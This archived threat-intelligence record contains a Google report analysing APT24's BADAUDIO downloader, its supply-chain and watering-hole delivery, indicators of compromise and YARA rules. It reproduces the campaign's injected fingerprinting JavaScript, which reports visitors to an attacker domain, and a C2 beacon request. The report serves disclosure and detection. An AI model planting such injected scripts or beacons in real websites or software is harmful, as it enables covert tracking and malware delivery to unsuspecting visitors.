{ "id": "a1d807b7-6853-41dc-bed1-c57ea9ff9f98", "created_at": "2026-04-06T00:11:54.070532Z", "updated_at": "2026-04-10T13:11:23.334558Z", "deleted_at": null, "sha1_hash": "927127a9ff37420b191af7b81035bf637fa6ba55", "title": "APT24's Pivot to Multi-Vector Attacks", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1486948, "plain_text": "APT24's Pivot to Multi-Vector Attacks\r\nBy Google Threat Intelligence Group\r\nPublished: 2025-11-20 · Archived: 2026-04-05 16:04:58 UTC\r\nWritten by: Harsh Parashar, Tierra Duncan, Dan Perez\r\nGoogle Threat Intelligence Group (GTIG) is tracking a long-running and adaptive cyber espionage campaign by\r\nAPT24, a People's Republic of China (PRC)-nexus threat actor. Spanning three years, APT24 has been deploying\r\nBADAUDIO, a highly obfuscated first-stage downloader used to establish persistent access to victim networks.\r\nWhile earlier operations relied on broad strategic web compromises to compromise legitimate websites, APT24\r\nhas recently pivoted to using more sophisticated vectors targeting organizations in Taiwan. This includes the\r\nrepeated compromise of a regional digital marketing firm to execute supply chain attacks and the use of targeted\r\nphishing campaigns.\r\nThis report provides a technical analysis of the BADAUDIO malware, details the evolution of APT24's delivery\r\nmechanisms from 2022 to present, and offers actionable intelligence to help defenders detect and mitigate this\r\npersistent threat.\r\nAs part of our efforts to combat serious threat actors, GTIG uses the results of our research to improve the safety\r\nand security of Google’s products and users. Upon discovery, all identified websites, domains, and files are added\r\nto the Safe Browsing blocklist in order to protect web users across major browsers. We also conducted a series of\r\nvictim notifications with technical details to compromised sites, enabling affected organizations to secure their\r\nsites and prevent future infections.\r\nFigure 1: BADAUDIO campaign overview\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/apt24-pivot-to-multi-vector-attacks/\r\nPage 1 of 11\n\nPayload Analysis: BADAUDIO and Cobalt Strike Beacon Integration\r\nThe BADAUDIO malware is a custom first-stage downloader written in C++ that downloads, decrypts, and\r\nexecutes an AES-encrypted payload from a hard-coded command and control (C2) server. The malware collects\r\nbasic system information, encrypts it using a hard-coded AES key, and sends it as a cookie value with the GET\r\nrequest to fetch the payload. The payload, in one case identified as Cobalt Strike Beacon, is decrypted with the\r\nsame key and executed in memory.\r\nGET https://wispy[.]geneva[.]workers[.]dev/pub/static/img/merged?version=65feddea0367 HTTP/1.1\r\nHost: wispy[.]geneva[.]workers[.]dev\r\nCookie: SSID=0uGjnpPHjOqhpT7PZJHD2WkLAxwHkpxMnKvq96VsYSCIjKKGeBfIKGKpqbRmpr6bBs8hT0ZtzL7/kHc+fyJkIoZ8hDyO8L3V1NF\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n--------------------------\r\nGET\r\ncfuvid=Iewmfm8VY6Ky-3-E-OVHnYBszObHNjr9MpLbLHDxX056bnRflosOpp2hheQHsjZFY2JmmO8abTekDPKzVjcpnedzNgEq2p3YSccJZkjRW\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\nFigure 2: BADAUDIO code sample\r\nThe malware is engineered with control flow flattening—a sophisticated obfuscation technique that systematically\r\ndismantles a program's natural, structured logic. This method replaces linear code with a series of disconnected\r\nblocks governed by a central \"dispatcher\" and a state variable, forcing analysts to manually trace each execution\r\npath and significantly impeding both automated and manual reverse engineering efforts.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/apt24-pivot-to-multi-vector-attacks/\r\nPage 2 of 11\n\nFigure 3: Control flow flattening heavily obfuscates BADAUDIO malware (expand image)\r\nBADAUDIO typically manifests as a malicious Dynamic Link Library (DLL) leveraging DLL Search Order\r\nHijacking (MITRE ATT\u0026CK T1574.001) for execution via legitimate applications. Recent variants observed\r\nindicate a refined execution chain: encrypted archives containing BADAUDIO DLLs along with VBS, BAT, and\r\nLNK files. \r\nThese supplementary files automate the placement of the BADAUDIO DLL and a legitimate executable into user\r\ndirectories, establish persistence through legitimate executable startup entries, and trigger the DLL sideloading.\r\nThis multi-layered approach to execution and persistence minimizes direct indicators of compromise.\r\nUpon execution, BADAUDIO collects rudimentary host information: hostname, username, and system\r\narchitecture. This collected data is then hashed and embedded within a cookie parameter in the C2 request header.\r\nThis technique provides a subtle yet effective method for beaconing and identifying compromised systems,\r\ncomplicating network-based detection.\r\nIn one of these cases, the subsequent payload, decrypted using a hard-coded AES key, has been confirmed as\r\nCobalt Strike Beacon. However, it is not confirmed that Cobalt Strike is present in every instance. The Beacon\r\npayload contained a relatively unique watermark that was previously observed in a separate APT24 campaign,\r\nshared in the Indicators of Compromise section. Cobalt Strike watermarks are a unique value generated from and\r\ntied to a given \"CobaltStrike.auth\" file. This value is embedded as the last 4 bytes for all BEACON stagers and in\r\nthe embedded configuration for full backdoor BEACON samples.\r\nCampaign Overview: BADAUDIO Delivery Evolves\r\nOver three years, APT24 leveraged various techniques to deliver BADAUDIO, including strategic web\r\ncompromises, repeated supply-chain compromise of a regional digital marketing firm in Taiwan, and spear\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/apt24-pivot-to-multi-vector-attacks/\r\nPage 3 of 11\n\nphishing.\r\nFigure 4: BADAUDIO campaign overview\r\nPublic Strategic Web Compromise Campaign\r\nBeginning in November 2022 we observed over 20 compromised websites spanning a broad array of subjects\r\nfrom regional industrial concerns to recreational goods, suggesting an opportunistic approach to initial access with\r\ntrue targeting selectively executed against visitors the attackers identified via fingerprinting. The legitimate\r\nwebsites were weaponized through the injection of a malicious JavaScript payload.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/apt24-pivot-to-multi-vector-attacks/\r\nPage 4 of 11\n\nFigure 5: Strategic web compromise attack flow to deliver BADAUDIO malware\r\nThis script exhibited an initial layer of targeting, specifically excluding macOS, iOS, Android, and various\r\nMicrosoft Internet Explorer/Edge browser variants to focus exclusively on Windows systems. This selectivity\r\nsuggests an adversary immediately narrowing their scope to optimize for a specific, likely high-value, victim\r\nprofile.\r\nThe injected JavaScript performed a critical reconnaissance function by employing the FingerprintJS library to\r\ngenerate a unique browser fingerprint. This fingerprint, transmitted via an HTTP request to an attacker-controlled\r\ndomain, served as an implicit validation mechanism. Upon successful validation, the victim was presented with a\r\nfabricated pop-up dialog, engineered to trick the user into downloading and executing BADAUDIO malware.\r\n$(window).ready(function() {\r\n var userAgent = navigator.userAgent;\r\n var isIE = userAgent.indexOf(\"compatible\") \u003e -1 \u0026\u0026 userAgent.indexOf(\"MSIE\") \u003e -1;\r\n var isEdge = userAgent.indexOf(\"Edge\") \u003e -1 \u0026\u0026 !isIE;\r\n var isIE11 = userAgent.indexOf('Trident') \u003e -1 \u0026\u0026 userAgent.indexOf(\"rv:11.0\") \u003e -1;\r\n var isMac = userAgent.indexOf('Macintosh') \u003e -1;\r\n var isiPhone = userAgent.indexOf('iPhone') \u003e -1;\r\n var isFireFox = userAgent.indexOf('Firefox') \u003e -1;\r\n if (!isIE \u0026\u0026 !isEdge \u0026\u0026 !isIE11 \u0026\u0026 !isMac \u0026\u0026 !isiPhone \u0026\u0026 !isFireFox) {\r\n var tag_script = document.createElement(\"script\");\r\n tag_script.type = \"text/javascript\";\r\n tag_script.src = \"https://cdn.jsdelivr.net/npm/@fingerprintjs/fingerprintjs@2/dist/fingerprint2.min.js\";\r\n tag_script.onload = \"initFingerprintJS()\";\r\n document.body.appendChild(tag_script);\r\n if (typeof(callback) !== \"undefined\") {\r\n tag_script.onload = function() {\r\n callback();\r\n }\r\n }\r\n function callback() {\r\n var option = {\r\n excludes: {\r\n screenResolution: true,\r\n availableScreenResolution: true,\r\n enumerateDevices: true\r\n }\r\n }\r\n new Fingerprint2.get(option, function(components) {\r\n var values = components.map(function(component) {\r\n return component.value\r\n })\r\n var murmur = Fingerprint2.x64hash128(values.join(''), 31);\r\n console.log(murmur)\r\n var script_tag = document.createElement(\"script\");\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/apt24-pivot-to-multi-vector-attacks/\r\nPage 5 of 11\n\nscript_tag.setAttribute(\"src\", \"https://www[.]twisinbeth[.]com/query.php?id=\" + murmur);\r\n document.body.appendChild(script_tag);\r\n });\r\n }\r\n }\r\n});\r\nFigure 6: Early malicious fingerprinting JS used in strategic web compromise campaigns\r\nFigure 7: Example of attacker fake update pop-up dialog impersonating Chrome to lure targets to download and\r\nexecute BADAUDIO malware\r\nThe attackers consistently shift their infrastructure, using a mix of newly registered domains and domains they\r\nhave previously compromised. We last observed this tactic in early September 2025.\r\nEscalation: Supply Chain Compromise for Strategic Web Compromises at Scale \r\nIn July 2024, APT24 compromised a regional digital marketing firm in Taiwan- a supply chain attack that\r\nimpacted more than 1,000 domains. Notably, the firm experienced multiple re-compromises over the last year,\r\ndemonstrating APT24's persistent commitment to the operation.\r\nWe initiated a multifaceted remediation effort to disrupt these threats. In addition to developing custom logic to\r\nidentify and block the modified, malicious JavaScript, GTIG distributed victim notifications to the individual\r\ncompromised websites and the compromised marketing firm. These notifications provided specific details about\r\nthe threat and the modifications made to the original script, enabling affected organizations to secure their sites\r\nand prevent future infections.\r\nIn the first iteration of the supply chain compromise, APT24 injected the malicious script into a widely used\r\nJavaScript library (MITRE ATT\u0026CK T1195.001) provided by the firm, leveraging a typosquatting domain to\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/apt24-pivot-to-multi-vector-attacks/\r\nPage 6 of 11\n\nimpersonate a legitimate Content Delivery Network (CDN). The deobfuscated JavaScript reveals a multi-stage\r\ninfection chain:\r\nDynamic Dependency Loading: The script dynamically loads legitimate jQuery and FingerprintJS2\r\nlibraries (MITRE ATT\u0026CK T1059.007) from a public CDN if not already present, ensuring consistent\r\nexecution across diverse web environments.\r\nMulti-Layer JS Concealment: During a re-compromise discovered in July 2025, the adversary took\r\nadditional steps to hide their malicious code. The highly obfuscated script (MITRE ATT\u0026CK T1059) was\r\ndeliberately placed within a maliciously modified JSON file served by the vendor, which was then loaded\r\nand executed by another compromised JavaScript file. This tactic effectively concealed the final payload in\r\na file type and structure not typically associated with code execution.\r\nAdvanced Fingerprinting: FingerprintJS2 is utilized to generate an x64hash128 browser and environmental\r\nfingerprint (MITRE ATT\u0026CK T1082) . The x64hash128 is the resulting 128-bit hash value produced by\r\nthe MurmurHash3 algorithm, which processes a large input string of collected browser characteristics\r\n(such as screen resolution, installed fonts, and GPU details) to create a unique, consistent identifier for the\r\nuser's device.\r\nCovert Data Exfiltration and Staging: A POST request, transmitting Base64-encoded reconnaissance data\r\n(including host, url, useragent, fingerprint, referrer, time, and a unique identifier), is sent to an attacker's\r\nendpoint (MITRE ATT\u0026CK T1041). \r\nAdaptive Payload Delivery: Successful C2 responses trigger the dynamic loading of a subsequent script\r\nfrom a URL provided in the response's data field. This cloaked redirect leads to BADAUDIO landing\r\npages, contingent on the attacker's C2 logic and fingerprint assessment (MITRE ATT\u0026CK T1105).\r\nTailored Targeting: The compromise in June 2025 initially employed conditional script loading based on a\r\nunique web ID (the specific domain name) related to the website using the compromised third-party\r\nscripts. This suggests tailored targeting, limiting the strategic web compromise (MITRE ATT\u0026CK T1189)\r\nto a single domain. However, for a ten-day period in August, the conditions were temporarily lifted,\r\nallowing all 1,000 domains using the scripts to be compromised before the original restriction was\r\nreimposed.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/apt24-pivot-to-multi-vector-attacks/\r\nPage 7 of 11\n\nFigure 8: Compromised JS supply chain attack to deliver BADAUDIO malware\r\nTargeted Phishing Campaigns\r\nComplementing their broader web-based attacks, APT24 concurrently conducted highly targeted social\r\nengineering campaigns. Lures, such as an email purporting to be from an animal rescue organization, leveraged\r\nsocial engineering to elicit user interaction and drive direct malware downloads from attacker-controlled domains.\r\nSeparate campaigns abused legitimate cloud storage platforms including Google Drive and OneDrive to distribute\r\nencrypted archives containing BADAUDIO. Google protected users by diverting these messages to spam,\r\ndisrupting the threat actor’s effort to leverage reputable services in their campaigns.\r\nAPT24 included pixel tracking links, confirming email opens and potentially validating target interest for\r\nsubsequent exploitation. This dual-pronged approach—leveraging widely trusted cloud services and explicit\r\ntracking—enhances their ability to conduct effective, personalized campaigns.\r\nOutlook\r\nThis nearly three-year campaign is a clear example of the continued evolution of APT24’s operational capabilities\r\nand highlights the sophistication of PRC-nexus threat actors. The use of advanced techniques like supply chain\r\ncompromise, multi-layered social engineering, and the abuse of legitimate cloud services demonstrates the actor's\r\ncapacity for persistent and adaptive espionage. \r\nThis activity follows a broader trend GTIG has observed of PRC-nexus threat actors increasingly employing\r\nstealthy tactics to avoid detection. GTIG actively monitors ongoing threats from actors like APT24 to protect users\r\nand customers. As part of this effort, Google continuously updates its protections and has taken specific action\r\nagainst this campaign.\r\nWe are committed to sharing our findings with the security community to raise awareness and to disrupt this\r\nactivity. We hope that improved understanding of tactics and techniques will enhance threat hunting capabilities\r\nand lead to stronger user protections across the industry.\r\nAcknowledgements \r\nThis analysis would not have been possible without the assistance from FLARE. We would like to specifically\r\nthank Ray Leong, Jay Gibble and Jon Daniels for their contributions to the analysis and detections for\r\nBADAUDIO.\r\nIndicators of Compromise\r\nA Google Threat Intelligence (GTI) collection of related IOCs is available to registered users.\r\nStrategic Web Compromise JS\r\n88fa2b5489d178e59d33428ba4088d114025acd1febfa8f7971f29130bda1213\r\n032c333eab80d58d60228691971d79b2c4cd6b9013bae53374dd986faa0f3f4c\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/apt24-pivot-to-multi-vector-attacks/\r\nPage 8 of 11\n\nae8473a027b0bcc65d1db225848904e54935736ab943edf3590b847cb571f980\r\n0e98baf6d3b67ca9c994eb5eb9bbd40584be68b0db9ca76f417fb3bcec9cf958\r\n55e02a81986aa313b663c3049d30ea0158641a451cb8190233c09bef335ef5c7\r\nStrategic Web Compromise — Modified Supplier JS\r\n07226a716d4c8e012d6fabeffe2545b3abfc0b1b9d2fccfa500d3910e27ca65b\r\n5c37130523c57a7d8583c1563f56a2e2f21eef5976380fdb3544be62c6ad2de5\r\n1f31ddd2f598bd193b125a345a709eedc3b5661b0645fc08fa19e93d83ea5459\r\nc4e910b443b183e6d5d4e865dd8f978fd635cd21c765d988e92a5fd60a4428f5\r\n2ea075c6cd3c065e541976cdc2ec381a88b748966f960965fdbe72a5ec970d4e\r\nBADAUDIO Binaries\r\n9ce49c07c6de455d37ac86d0460a8ad2544dc15fb5c2907ed61569b69eefd182\r\nd23ca261291e4bad67859b5d4ee295a3e1ac995b398ccd4c06d2f96340b4b5f8\r\ncfade5d162a3d94e4cba1e7696636499756649b571f3285dd79dea1f5311adcd\r\nf086c65954f911e70261c729be2cdfa2a86e39c939edee23983090198f06503c\r\nf1e9d57e0433e074c47ee09c5697f93fde7ff50df27317c657f399feac63373a\r\n176407b1e885496e62e1e761bbbb1686e8c805410e7aec4ee03c95a0c4e9876f\r\nc7565ed061e5e8b2f8aca67d93b994a74465e6b9b01936ecbf64c09ac6ee38b9\r\n83fb652af10df4574fa536700fa00ed567637b66f189d0bbdb911bd2634b4f0e\r\nStrategic Web Compromise — Stage 2\r\nwww[.]availableextens[.]com\r\nwww[.]twisinbeth[.]com\r\nwww[.]decathlonm[.]com\r\nwww[.]gerikinage[.]com\r\nwww[.]p9-car[.]com\r\nwww[.]growhth[.]com\r\nwww[.]brighyt[.]com\r\ntaiwantradoshows[.]com\r\njsdelivrs[.]com\r\nBADAUDIO C2\r\nclients[.]brendns.workers[.]dev\r\nwww[.]cundis[.]com\r\nwispy[.]geneva[.]workers[.]dev\r\nwww[.]twisinbeth[.]com\r\ntradostw[.]com\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/apt24-pivot-to-multi-vector-attacks/\r\nPage 9 of 11\n\njarzoda[.]net\r\ntrcloudflare[.]com\r\nroller[.]johallow.workers[.]dev\r\nCobalt Strike Beacon Watermark\r\nWatermark_Hash: BeudtKgqnlm0Ruvf+VYxuw==\r\nYARA Rules\r\nrule G_Downloader_BADAUDIO_1 {\r\nmeta:\r\nauthor = \"Google Threat Intelligence Group (GTIG)\"\r\nstrings:\r\n$string_decode = { 0F 28 [1-5] 0F 29 [1-5] 0F 28 [1-5] 0F 28 [1-5] 0F 28 [1-5] 0F 55 ?? 0F 55\r\n$s1 = \"SystemFunction036\" fullword\r\n$s2_b64marker = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\" fullword\r\n$control_flow_obfuscation = { 66 2E 0F 1F 84 00 00 00 00 00 81 [5] 7? ?? 81 [5] 7? ?? 81 [5] 7\r\ncondition:\r\nuint16(0) == 0x5a4d and all of them and #string_decode \u003e 2 and #control_flow_obfuscation \u003e 2\r\n}\r\nrule G_Downloader_BADAUDIO_2 {\r\nmeta:\r\nauthor = \"Google Threat Intelligence Group (GTIG)\"\r\nstrings:\r\n$c_string_decode = { C5 F8 28 [1-24] C5 F8 57 [1-8] 0F 94 [4-128] C5 F8 29 [1-64] C5 F8 29 [1-\r\n$s1 = \"SystemFunction036\" fullword\r\n$s2_b64marker = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\" fullword\r\n$control_flow_obfuscation = { 66 2E 0F 1F 84 00 00 00 00 00 81 [5] 7? ?? 81 [5] 7? ?? 81 [5] 7\r\n$c_part_of_control_flow_obfuscation_and_string_decode = { C5 F8 28 [1-5] 8B 46 ?? C5 F8 57 40\r\ncondition:\r\nuint16(0) == 0x5a4d and all of ($s*) and #control_flow_obfuscation \u003e 2 and ($c_string_decode o\r\n}\r\nrule G_APT_DOWNLOADER_BADAUDIO_3 {\r\n meta:\r\n author = \"Google Threat Intelligence Group (GTIG)\"\r\n strings:\r\n $s1 = \"SystemFunction036\"\r\n $s2 = \"6666666666666666\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\"\r\n $dc1 = { C1 C2 1A ?? ?? C1 C3 15 31 D3 ?? ?? C1 C2 07 }\r\n $dc2 = { C1 C1 1E ?? ?? C1 C6 13 ?? ?? C1 C0 0A 31 }\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/apt24-pivot-to-multi-vector-attacks/\r\nPage 10 of 11\n\n$dc3 = { C1 C5 19 C1 C7 0E 01 ?? ?? ?? 31 EF C1 EB 03 31 }\r\n $dc4 = { C1 C7 0F 8B ?? ?? ?? ?? ?? C1 C3 0D 31 FB C1 EA 0A 31 }\r\n $f1 = { ( 0F 1F 84 00 00 00 00 00 | 66 2E 0F 1F 84 00 00 00 00 00 | 0F 1F 44 00 00 | 0F 1F 40 00 | 0F 1F\r\n $f2 = /\\x0F\\x4C\\xC1\\x3D[\\x01-\\xFF].{3}([\\x70-\\x7f].|\\x0f[\\x80-\\x8f].{4})\\x3D[\\x01-\\xFF].{3}([\\x70-\\x7f].\r\n condition:\r\n all of ($s*) and 3 of ($dc*) and uint16(0) == 0x5A4D and (#f1 \u003e 5 or #f2 \u003e 2) and filesize \u003c 10MB\r\n}\r\nrule G_APT_DOWNLOADER_BADAUDIO_4 {\r\n meta:\r\n author = \"Google Threat Intelligence Group (GTIG)\"\r\n strings:\r\n $p00_0 = {8d4d??e8[4]8b7d??83c6??eb??c745[5]e8[4]8b4d??64890d}\r\n $p00_1 = {568b7c24??8b7424??8b5424??89f1e8[4]f20f1007f20f104f??f20f118e}\r\n condition:\r\n uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and\r\n (\r\n ($p00_0 in (0..1100000) and $p00_1 in (0..990000))\r\n )\r\n}\r\nPosted in\r\nThreat Intelligence\r\nSource: https://cloud.google.com/blog/topics/threat-intelligence/apt24-pivot-to-multi-vector-attacks/\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/apt24-pivot-to-multi-vector-attacks/\r\nPage 11 of 11", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://cloud.google.com/blog/topics/threat-intelligence/apt24-pivot-to-multi-vector-attacks/" ], "report_names": [ "apt24-pivot-to-multi-vector-attacks" ], "threat_actors": [ { "id": "6241b9be-9c59-4164-a7f2-c45844b14a56", "created_at": "2023-01-06T13:46:38.321506Z", "updated_at": "2026-04-10T02:00:02.926657Z", "deleted_at": null, "main_name": "APT24", "aliases": [ "PITTY PANDA", "G0011", "Temp.Pittytiger" ], "source_name": "MISPGALAXY:APT24", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d", "created_at": "2022-10-25T16:07:24.139848Z", "updated_at": "2026-04-10T02:00:04.878798Z", "deleted_at": null, "main_name": "Safe", "aliases": [], "source_name": "ETDA:Safe", "tools": [ "DebugView", "LZ77", "OpenDoc", "SafeDisk", "TypeConfig", "UPXShell", "UsbDoc", "UsbExe" ], "source_id": "ETDA", "reports": null }, { "id": "f4f16213-7a22-4527-aecb-b964c64c2c46", "created_at": "2024-06-19T02:03:08.090932Z", "updated_at": "2026-04-10T02:00:03.6289Z", "deleted_at": null, "main_name": "GOLD NIAGARA", "aliases": [ "Calcium ", "Carbanak", "Carbon Spider ", "FIN7 ", "Navigator ", "Sangria Tempest ", "TelePort Crew " ], "source_name": "Secureworks:GOLD NIAGARA", "tools": [ "Bateleur", "Carbanak", "Cobalt Strike", "DICELOADER", "DRIFTPIN", "GGLDR", "GRIFFON", "JSSLoader", "Meterpreter", "OFFTRACK", "PILLOWMINT", "POWERTRASH", "SUPERSOFT", "TAKEOUT", "TinyMet" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775434314, "ts_updated_at": 1775826683, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/927127a9ff37420b191af7b81035bf637fa6ba55.pdf", "text": "https://archive.orkl.eu/927127a9ff37420b191af7b81035bf637fa6ba55.txt", "img": "https://archive.orkl.eu/927127a9ff37420b191af7b81035bf637fa6ba55.jpg" } }